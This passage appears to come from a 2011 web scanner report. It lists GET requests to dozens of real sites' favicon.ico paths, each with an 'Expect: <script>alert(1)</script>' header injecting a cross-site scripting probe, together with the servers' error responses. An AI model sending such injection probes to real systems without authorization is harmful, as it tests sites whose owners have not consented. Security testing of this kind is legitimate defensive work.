User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.blackintrusion.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.67
Date: Mon, 02 May 2011 00:35:47 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.7.67</center>
</body>
</html>

33.26. http://www.clipsguide.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.clipsguide.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.clipsguide.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Sun, 01 May 2011 19:40:43 GMT
Content-Type: text/html
Connection: keep-alive
Content-Length: 162

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx</center>
</body>
</html>

33.27. http://www.coolquiz.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.coolquiz.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.coolquiz.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 01 May 2011 23:35:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-type: text/html
Page-Completion-Status: Normal


                                                                       <html>
   <head><title>Page Not Found</title>
   </head>
   <style>
   
   body {background-color: FFFFFF;}
   .bg0 {padding:0p
...[SNIP]...

33.28. http://www.cramster.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cramster.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cramster.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:55:55 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

33.29. http://www.crankyape.com/crankyape_logo.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.crankyape.com
Path:   /crankyape_logo.gif

Request

GET /crankyape_logo.gif HTTP/1.1
Host: www.crankyape.com
Proxy-Connection: keep-alive
Referer: http://www.crankyape.com/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 01:53:15 GMT
Content-Length: 103
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET

<html><head><title>Error</title></head><body>The system cannot find the file specified.
</body></html>

33.30. http://www.cricbuzz.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cricbuzz.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cricbuzz.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 02 May 2011 00:08:23 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx</center>
</body>
</html>

33.31. http://www.cyberhomes.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cyberhomes.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cyberhomes.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:51:17 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

33.32. http://www.dailynewnowa.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dailynewnowa.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.dailynewnowa.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.0 403 Forbidden
Cache-Control: no-cache
Connection: close
Content-Type: text/html

<html><body><h1>403 Forbidden</h1>
Request forbidden by administrative rules.
</body></html>


33.33. http://www.dermnet.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dermnet.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.dermnet.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/7.0
Date: Mon, 02 May 2011 00:01:47 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

33.34. http://www.diskeeper.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.diskeeper.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.diskeeper.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:55:50 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

33.35. http://www.earthfare.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.earthfare.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.earthfare.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:10:01 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

33.36. http://www.easyearnsurveys.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.easyearnsurveys.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.easyearnsurveys.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 02 May 2011 00:22:41 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
Content-Length: 187

<html>
<head>
<title>Error</title>
</head>
<body>
<div>
<h3>Please try again later. Thank you.</h3>
</div>
</body>
</html>

33.37. http://www.expresstoll.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expresstoll.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.expresstoll.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 403 Forbidden
Content-Length: 368
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:23:04 GMT

<script type="text/javascript">
function redirectToHttps()
{
var httpURL = window.location.hostname + window.location.pathname;

var httpsURL = "https://" + httpURL ;

if(window.lo
...[SNIP]...

33.38. http://www.female-anatomy.net/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.female-anatomy.net
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.female-anatomy.net
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.62
Date: Sun, 01 May 2011 23:35:35 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.7.62</center>
</body>
</html>

33.39. http://www.flashymodels.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.flashymodels.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.flashymodels.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.67
Date: Sun, 01 May 2011 23:22:06 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.7.67</center>
</body>
</html>

33.40. http://www.forrabbits.eu/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.forrabbits.eu
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.forrabbits.eu
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.0 403 Forbidden
Cache-Control: no-cache
Connection: close
Content-Type: text/html

<html><body><h1>403 Forbidden</h1>
Request forbidden by administrative rules.
</body></html>


33.41. http://www.freegroceriesdirectory.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freegroceriesdirectory.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.freegroceriesdirectory.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:29:13 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

33.42. http://www.giftcertificatedelivery.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.giftcertificatedelivery.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.giftcertificatedelivery.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 02 May 2011 00:52:15 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
Content-Length: 187

<html>
<head>
<title>Error</title>
</head>
<body>
<div>
<h3>Please try again later. Thank you.</h3>
</div>
</body>
</html>

33.43. http://www.govacuum.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.govacuum.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.govacuum.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:16:49 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

33.44. http://www.gpwa.org/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gpwa.org
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gpwa.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
X-Server: WP7a
Date: Sun, 01 May 2011 23:44:54 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

33.45. http://www.hairyfilm.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hairyfilm.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hairyfilm.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.62
Date: Sun, 01 May 2011 23:45:12 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.7.62</center>
</body>
</html>

33.46. http://www.hairygirlspussies.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hairygirlspussies.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hairygirlspussies.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.62
Date: Sun, 01 May 2011 23:47:27 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.7.62</center>
</body>
</html>

33.47. http://www.hsj.org/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hsj.org
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hsj.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:29:49 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

33.48. http://www.ibegin.com/weather/weather_widget.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ibegin.com
Path:   /weather/weather_widget.php

Request

GET /weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&smallicon=1&current=1&forecast=1&background_color=ffffff&color=000000&width=175&padding=10&border_width=1&border_color=000000&font_size=11&font_family=Verdana&showicons=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.ibegin.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:42:57 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 773


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line
...[SNIP]...

33.49. http://www.inmates-searches.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.inmates-searches.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.inmates-searches.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:29:00 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

33.50. http://www.insites.eu/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.insites.eu
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.insites.eu
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:53:05 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

33.51. http://www.japanator.com/elephant/index_cblogs-mini.phtml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.japanator.com
Path:   /elephant/index_cblogs-mini.phtml

Request

GET /elephant/index_cblogs-mini.phtml?y=community&cblogs=1 HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/elephant/login.phtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=166092581.1304319358.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __qca=P0-1959175184-1304319359595; __gads=ID=7663cdffe0743e5f:T=1304301360:S=ALNI_MY9hx2TYA5pFIO3VfXdWq6RQ66VSA; __utma=166092581.878351806.1304319358.1304319358.1304319358.1; __utmc=166092581; __utmb=166092581.3.10.1304319358

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 01:56:27 GMT
Server: lighttpd/1.4.28
Content-Length: 7359


   <html>
<body leftmargin=10 topmargin=10>

<div class="post-mini-cblogs" style="font-size:11px; font-family:arial; display:block;">
       <span class="post-avatar">
       <a href="profile.phtml?u=Rewarp" tar
...[SNIP]...

33.52. http://www.japanator.com/elephant/login.phtml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.japanator.com
Path:   /elephant/login.phtml

Request

GET /elephant/login.phtml HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/favicon.ico'
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=166092581.1304319358.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __utma=166092581.878351806.1304319358.1304319358.1304319358.1; __utmc=166092581; __utmb=166092581.1.10.1304319358; __qca=P0-1959175184-1304319359595; __gads=ID=7663cdffe0743e5f:T=1304301360:S=ALNI_MY9hx2TYA5pFIO3VfXdWq6RQ66VSA

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 01:55:17 GMT
Server: lighttpd/1.4.28
Content-Length: 47739


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Login | Japan
...[SNIP]...

33.53. http://www.japanator.com/elephant/signup.phtml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.japanator.com
Path:   /elephant/signup.phtml

Request

GET /elephant/signup.phtml HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=166092581.1304319358.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __qca=P0-1959175184-1304319359595; __gads=ID=7663cdffe0743e5f:T=1304301360:S=ALNI_MY9hx2TYA5pFIO3VfXdWq6RQ66VSA; __utma=166092581.878351806.1304319358.1304319358.1304319358.1; __utmc=166092581; __utmb=166092581.3.10.1304319358

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 02:06:57 GMT
Server: lighttpd/1.4.28
Content-Length: 46289


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Signup for an
...[SNIP]...

33.54. http://www.kieronwilliamson.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kieronwilliamson.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.kieronwilliamson.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Length: 1116
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: PleskWin
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:17:56 GMT

<HTML>
<HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD>
<BODY>
<H1>Not Found</H1>
The requested document was not found on this server.
<P>
<HR>
<ADDRESS>
Web Server at &#119;&#101;&#98;&#45;&#100
...[SNIP]...

33.55. http://www.laptoptracking.net/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.laptoptracking.net
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.laptoptracking.net
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 02 May 2011 00:05:02 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
Content-Length: 187

<html>
<head>
<title>Error</title>
</head>
<body>
<div>
<h3>Please try again later. Thank you.</h3>
</div>
</body>
</html>

33.56. http://www.laterooms.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.laterooms.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.laterooms.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
X-UA-Compatible: IE=EmulateIE8
Date: Mon, 02 May 2011 00:28:54 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

33.57. http://www.leagle.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.leagle.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.leagle.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.0
Date: Mon, 02 May 2011 00:53:28 GMT
Content-Length: 75

The page cannot be displayed because an internal server error has occurred.

33.58. http://www.lee.net/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lee.net
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.lee.net
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: WWW
Content-Type: text/html
Date: Mon, 02 May 2011 00:19:23 GMT
X-TN-ServedBy: cms.img.83
Force-Status: 1
Accept-Ranges: bytes
ETag: "1828397"
Last-Modified: Tue, 14 Oct 2008 18:45:00 GMT
Real-Hostname: lee.net
Content-Length: 680
Connection: Keep-Alive
X-Cache-Info: cached

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>    
<title>Element not valid</title>
<style type="text/css">
body { background-color: white;
color: black;

...[SNIP]...

33.59. http://www.mecum.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mecum.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mecum.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
Date: Mon, 02 May 2011 00:04:54 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

33.60. http://www.myfavoritegames.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myfavoritegames.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.myfavoritegames.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
P3P: CP="NID DSP CAO COR"
Date: Sun, 01 May 2011 23:31:53 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

33.61. http://www.mylearningplan.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mylearningplan.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mylearningplan.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Length: 492
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: SessionID=%7BB37083AE%2D04D4%2D461A%2DB2D9%2D387A5E72C198%7D; domain=.mylearningplan.com; path=/
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:53:09 GMT

<div id='section_D'>
           <h1><b>Error Message</b></h1>
<div class='alert'>
<p></p>
<p></p>
<p align='center'><strong>Error: An Error Has occurred on this page</strong></p>
<p></p>
<p align='cent
...[SNIP]...

33.62. http://www.myrtlebeach-resorts.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myrtlebeach-resorts.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.myrtlebeach-resorts.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Length: 103
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:48:47 GMT

<html><head><title>Error</title></head><body>The system cannot find the file specified.
</body></html>

33.63. http://www.nfcc.org/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
